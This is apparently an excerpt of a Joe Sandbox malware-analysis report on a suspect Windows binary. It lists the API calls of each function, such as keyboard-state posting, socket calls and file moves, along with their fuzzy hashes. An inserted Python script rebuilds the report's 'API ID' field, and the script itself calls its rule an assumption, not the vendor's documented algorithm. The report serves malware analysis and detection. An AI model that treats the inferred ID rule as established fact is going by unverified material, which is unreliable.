                                                                                  • Part of subcall function 0063000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630046
                                                                                  • Part of subcall function 0063000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?,?), ref: 00630054
                                                                                  • Part of subcall function 0063000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0062FF41,80070057,?), ref: 00630064
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00654C51
                                                                                • _wcslen.LIBCMT ref: 00654D59
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00654DCF
                                                                                • CoTaskMemFree.OLE32(?), ref: 00654DDA
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 614568839-2785691316
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 00662183
                                                                                • GetMenuItemCount.USER32(00000000), ref: 006621B5
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006621DD
                                                                                • _wcslen.LIBCMT ref: 00662213
                                                                                • GetMenuItemID.USER32(?,?), ref: 0066224D
                                                                                • GetSubMenu.USER32(?,?), ref: 0066225B
                                                                                  • Part of subcall function 00633A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00633A57
                                                                                  • Part of subcall function 00633A3D: GetCurrentThreadId.KERNEL32 ref: 00633A5E
                                                                                  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006622E3
                                                                                  • Part of subcall function 0063E97B: Sleep.KERNEL32 ref: 0063E9F3
                                                                                Similarity
                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                • String ID:
                                                                                • API String ID: 4196846111-0
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0063AEF9
                                                                                • GetKeyboardState.USER32(?), ref: 0063AF0E
                                                                                • SetKeyboardState.USER32(?), ref: 0063AF6F
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0063AF9D
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0063AFBC
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 0063AFFD
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0063B020
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 0063AD19
                                                                                • GetKeyboardState.USER32(?), ref: 0063AD2E
                                                                                • SetKeyboardState.USER32(?), ref: 0063AD8F
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0063ADBB
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0063ADD8
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0063AE17
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0063AE38
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(00613CD6,?,?,?,?,?,?,?,?,00605BA3,?,?,00613CD6,?,?), ref: 00605470
                                                                                • __fassign.LIBCMT ref: 006054EB
                                                                                • __fassign.LIBCMT ref: 00605506
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00613CD6,00000005,00000000,00000000), ref: 0060552C
                                                                                • WriteFile.KERNEL32(?,00613CD6,00000000,00605BA3,00000000,?,?,?,?,?,?,?,?,?,00605BA3,?), ref: 0060554B
                                                                                • WriteFile.KERNEL32(?,?,00000001,00605BA3,00000000,?,?,?,?,?,?,?,?,?,00605BA3,?), ref: 00605584
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: 3583c4418a844214423aa3c6d6d974fd5d2cfafdabe249e6cc4a2daf79bb2dc3
                                                                                • Instruction ID: 1ac741aea1acae8a48eafcfb1596d3b384a42c46ab89f9657dc4abec43d48c12
                                                                                • Opcode Fuzzy Hash: 3583c4418a844214423aa3c6d6d974fd5d2cfafdabe249e6cc4a2daf79bb2dc3
                                                                                • Instruction Fuzzy Hash: F651C070A006499FDB15CFA8DC45AEFBBFAEF09300F14455AE956E7291E730AA41CF60
                                                                                APIs
                                                                                  • Part of subcall function 0065304E: inet_addr.WSOCK32(?), ref: 0065307A
                                                                                  • Part of subcall function 0065304E: _wcslen.LIBCMT ref: 0065309B
                                                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00651112
                                                                                • WSAGetLastError.WSOCK32 ref: 00651121
                                                                                • WSAGetLastError.WSOCK32 ref: 006511C9
                                                                                • closesocket.WSOCK32(00000000), ref: 006511F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 2675159561-0
                                                                                • Opcode ID: 3ee3f0821d4aa422fcc167a86a03ad970e025b26fb48c1ee892f8cf9521627c9
                                                                                • Instruction ID: b96ae978a3731c92d57ccd551218f53b11690bb495e791fbe499184517b3aea6
                                                                                • Opcode Fuzzy Hash: 3ee3f0821d4aa422fcc167a86a03ad970e025b26fb48c1ee892f8cf9521627c9
                                                                                • Instruction Fuzzy Hash: 1A41E231200A05AFDB209F24C884BE9BBAAFF85325F14809AFD459F391C774AD45CBA0
                                                                                APIs
                                                                                  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0063CF22,?), ref: 0063DDFD
                                                                                  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0063CF22,?), ref: 0063DE16
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0063CF45
                                                                                • MoveFileW.KERNEL32(?,?), ref: 0063CF7F
                                                                                • _wcslen.LIBCMT ref: 0063D005
                                                                                • _wcslen.LIBCMT ref: 0063D01B
                                                                                • SHFileOperationW.SHELL32(?), ref: 0063D061
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 3164238972-1173974218
                                                                                • Opcode ID: c19cbae229a2243a985d9074e951009087e2c2ec1cbe6897e0187ea3f22caa52
                                                                                • Instruction ID: 170ae0a93c41b8ba0ff475ccd7b71f069a6652e05524a1bb57bd4d0a6c18da5e
                                                                                • Opcode Fuzzy Hash: c19cbae229a2243a985d9074e951009087e2c2ec1cbe6897e0187ea3f22caa52
                                                                                • Instruction Fuzzy Hash: 0F415775D452195FDF12EFA4D985AEEB7BAAF44340F0000EAE505EB241EB34A685CF90
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00662E1C
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00662E4F
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00662E84
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00662EB6
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00662EE0
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00662EF1
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00662F0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 27f7186bf049e7bf18a36f22872fe7d23367088a82cc46e9b6593c3be652f677
                                                                                • Instruction ID: 16d2e1828092397ec0e5d10790f19f61bcad6a58db12af7a81f42f37dee1f1a6
                                                                                • Opcode Fuzzy Hash: 27f7186bf049e7bf18a36f22872fe7d23367088a82cc46e9b6593c3be652f677
                                                                                • Instruction Fuzzy Hash: 6E3115306449429FDB20DF59DC94FA537E2FB5A720F1411A5FA50CF2B1CBB2A840DB41
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637769
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063778F
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00637792
                                                                                • SysAllocString.OLEAUT32(?), ref: 006377B0
                                                                                • SysFreeString.OLEAUT32(?), ref: 006377B9
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006377DE
                                                                                • SysAllocString.OLEAUT32(?), ref: 006377EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 01de79182c631b1f0419ab42060a214715a699674cfe21d516cba894319edcc7
                                                                                • Instruction ID: 3609eac1b4b0ed9e08d80d7cd02bffb316af1f769f601687c37c6bd7dce0b47f
                                                                                • Opcode Fuzzy Hash: 01de79182c631b1f0419ab42060a214715a699674cfe21d516cba894319edcc7
                                                                                • Instruction Fuzzy Hash: 522192B6608619AFDB20DFA9CC88CFB77EEEB09764B048025F955DB250DA70DC41C7A0
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637842
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637868
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0063786B
                                                                                • SysAllocString.OLEAUT32 ref: 0063788C
                                                                                • SysFreeString.OLEAUT32 ref: 00637895
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006378AF
                                                                                • SysAllocString.OLEAUT32(?), ref: 006378BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: f0adfc8649db4bac3996170f97192ceee0ce18adc3a728177979a743b9122129
                                                                                • Instruction ID: 7fef09dd6ef4e9b0ebfe89e453f3c8ee4e0ebe390914db6a3561256f9a619208
                                                                                • Opcode Fuzzy Hash: f0adfc8649db4bac3996170f97192ceee0ce18adc3a728177979a743b9122129
                                                                                • Instruction Fuzzy Hash: E021A171608605AFDB209FA9DC8CDBA77EDEB09360B108135F955DB2A1DA70EC41CBA4
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 006404F2
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0064052E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 5af24e4926f43861b8bd3301fa40e19e6e2d3279819094787c14456840e4f69d
                                                                                • Instruction ID: e04efa2128c2032bc3d1a05d1f263f650753f118878d02ca2c5c393369d9e272
                                                                                • Opcode Fuzzy Hash: 5af24e4926f43861b8bd3301fa40e19e6e2d3279819094787c14456840e4f69d
                                                                                • Instruction Fuzzy Hash: 7F217475500315DFEF249F29DD44A9A7BB6EF45724F204A19F9A1D72E0D7709940CF20
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 006405C6
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00640601
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 63fe67f39758443406763b58b756d1b4ff1ffad03f4f87469c53735482f83915
                                                                                • Instruction ID: 83c116931461905c17f8076d07d72e208536a70155cb1d246d2b87074db86764
                                                                                • Opcode Fuzzy Hash: 63fe67f39758443406763b58b756d1b4ff1ffad03f4f87469c53735482f83915
                                                                                • Instruction Fuzzy Hash: 402197755003259BEB209F69CC04A9A77EABF95730F214A1DFEA2E73D0D7B09951CB10
                                                                                APIs
                                                                                  • Part of subcall function 005D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 005D604C
                                                                                  • Part of subcall function 005D600E: GetStockObject.GDI32(00000011), ref: 005D6060
                                                                                  • Part of subcall function 005D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D606A
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00664112
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0066411F
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0066412A
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00664139
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00664145
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 4f76691034b8dffd1f9910b86d403f20d6c31d8cb0c8bd8f366551886ef3a8f0
                                                                                • Instruction ID: 1d53ac64e09bfd8a871272263e365bc18d40372202dc3001e166a5fd5848e1ec
                                                                                • Opcode Fuzzy Hash: 4f76691034b8dffd1f9910b86d403f20d6c31d8cb0c8bd8f366551886ef3a8f0
                                                                                • Instruction Fuzzy Hash: E611E2B214021ABEEF109F64CC85EE77F6EEF093A8F004111FB18A2150CA729C61DBA4
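                                                                                Note on the Similarity "API ID" fields above: the value is derived only from the names in each function's "APIs" list, so it can be recomputed from the report text and used to match these functions against other reports. The script below is an added example, not part of the Joe Sandbox report or its tooling; the construction rule it implements (split CamelCase Win32 names into words, drop words shorter than four letters, keep lowercase CRT/Winsock names whole minus a trailing W, group words by frequency in descending order, sort each group in codepoint order and join the groups with "$") is inferred from the entries on this page and is an assumption, not Joe Sandbox's documented algorithm. The three embedded "APIs" blocks are copied from the entries above.

```python
import re
from collections import Counter

# One "APIs" bullet from the report: optional "Part of subcall function
# XXXX:" prefix, then Name.MODULE followed by "(" or " ref:".
_API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.[A-Z0-9]+"
)
# A Capitalised word inside a CamelCase Win32 name.  All-caps runs such as
# "CP", "WSA", "SH" and the trailing "W"/"GUID2" never match this pattern.
_CAMEL_WORD = re.compile(r"[A-Z][a-z]+")
# Assumption inferred from the report: Get/Set/Sys/Std/Rtl/To/Ex are dropped.
MIN_WORD_LEN = 4

# "APIs" blocks copied from three of the function entries above.
WRITEFILE_BLOCK = """
• GetConsoleCP.KERNEL32(00613CD6,?,?,?,?,?,?,?,?,00605BA3,?,?,00613CD6,?,?), ref: 00605470
• __fassign.LIBCMT ref: 006054EB
• __fassign.LIBCMT ref: 00605506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00613CD6,00000005,00000000,00000000), ref: 0060552C
• WriteFile.KERNEL32(?,00613CD6,00000000,00605BA3,00000000,?,?,?,?,?,?,?,?,?,00605BA3,?), ref: 0060554B
• WriteFile.KERNEL32(?,?,00000001,00605BA3,00000000,?,?,?,?,?,?,?,?,?,00605BA3,?), ref: 00605584
"""
SOCKET_BLOCK = """
  • Part of subcall function 0065304E: inet_addr.WSOCK32(?), ref: 0065307A
  • Part of subcall function 0065304E: _wcslen.LIBCMT ref: 0065309B
• socket.WSOCK32(00000002,00000001,00000006), ref: 00651112
• WSAGetLastError.WSOCK32 ref: 00651121
• WSAGetLastError.WSOCK32 ref: 006511C9
• closesocket.WSOCK32(00000000), ref: 006511F9
"""
BSTR_BLOCK = """
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00637769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063778F
• SysAllocString.OLEAUT32(00000000), ref: 00637792
• SysAllocString.OLEAUT32(?), ref: 006377B0
• SysFreeString.OLEAUT32(?), ref: 006377B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 006377DE
• SysAllocString.OLEAUT32(?), ref: 006377EC
"""


def api_names(block):
    """Return the API names, in report order, from one 'APIs' block."""
    names = []
    for line in block.splitlines():
        m = _API_LINE.search(line)
        if m:
            names.append(m.group(1))
    return names


def api_words(name):
    """Split one API name into the words that feed the API ID."""
    if name[0].isupper():
        # CamelCase Win32 name: keep Capitalised words of >= MIN_WORD_LEN letters.
        return [w for w in _CAMEL_WORD.findall(name) if len(w) >= MIN_WORD_LEN]
    # Lowercase CRT / Winsock name: one token, minus a trailing 'W' suffix.
    if len(name) > 1 and name.endswith("W"):
        name = name[:-1]
    return [name]


def api_id(block):
    """Rebuild the Similarity 'API ID' string from one 'APIs' block."""
    counts = Counter()
    for name in api_names(block):
        counts.update(api_words(name))
    groups = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    # Most frequent group first; words inside a group in codepoint order,
    # which is why "_wcslen" sorts after "Write" but before "closesocket".
    return "$".join(
        "".join(sorted(groups[n])) for n in sorted(groups, reverse=True)
    )


if __name__ == "__main__":
    for label, block in (("WriteFile", WRITEFILE_BLOCK),
                         ("socket", SOCKET_BLOCK),
                         ("BSTR", BSTR_BLOCK)):
        print(f"{label:10s} {api_id(block)}")
```

                                                                                Because the ID ignores call arguments, modules and call order, two functions that import the same words in the same proportions collide; treat a matching API ID as a candidate for comparison (then confirm with the Opcode or Instruction fuzzy hash), not as proof that two functions are the same code.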
                                                                                APIs
                                                                                  • Part of subcall function 0060D7A3: _free.LIBCMT ref: 0060D7CC
                                                                                • _free.LIBCMT ref: 0060D82D
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060D838
                                                                                • _free.LIBCMT ref: 0060D843
                                                                                • _free.LIBCMT ref: 0060D897
                                                                                • _free.LIBCMT ref: 0060D8A2
                                                                                • _free.LIBCMT ref: 0060D8AD
                                                                                • _free.LIBCMT ref: 0060D8B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                • Instruction ID: bf27d3cbd510fc234f9994b3cced58e768c10a32bcf6446aed7618c98acfa097
                                                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                • Instruction Fuzzy Hash: 64117C715C0B04AAD6A5BFF0CC0BFCB7BDEAF40B00F400D2DB299A60D2DA24F5058664
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0063DA74
                                                                                • LoadStringW.USER32(00000000), ref: 0063DA7B
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0063DA91
                                                                                • LoadStringW.USER32(00000000), ref: 0063DA98
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0063DADC
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0063DAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 4072794657-3128320259
                                                                                • Opcode ID: bf33f5f70902ecd5535666be63bbea8909d3a31e95eec132eb31a5c00435eea2
                                                                                • Instruction ID: 484ec9bd4489a6691f71381fe4b35005236d3f33a14996bfcdeb9c25d6d64121
                                                                                • Opcode Fuzzy Hash: bf33f5f70902ecd5535666be63bbea8909d3a31e95eec132eb31a5c00435eea2
                                                                                • Instruction Fuzzy Hash: 960186F29002087FE7109BA4DD89EF7776DEB08711F405496F746E2141E6B49E844FB4
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(01A2D970,01A2D970), ref: 0064097B
                                                                                • EnterCriticalSection.KERNEL32(01A2D950,00000000), ref: 0064098D
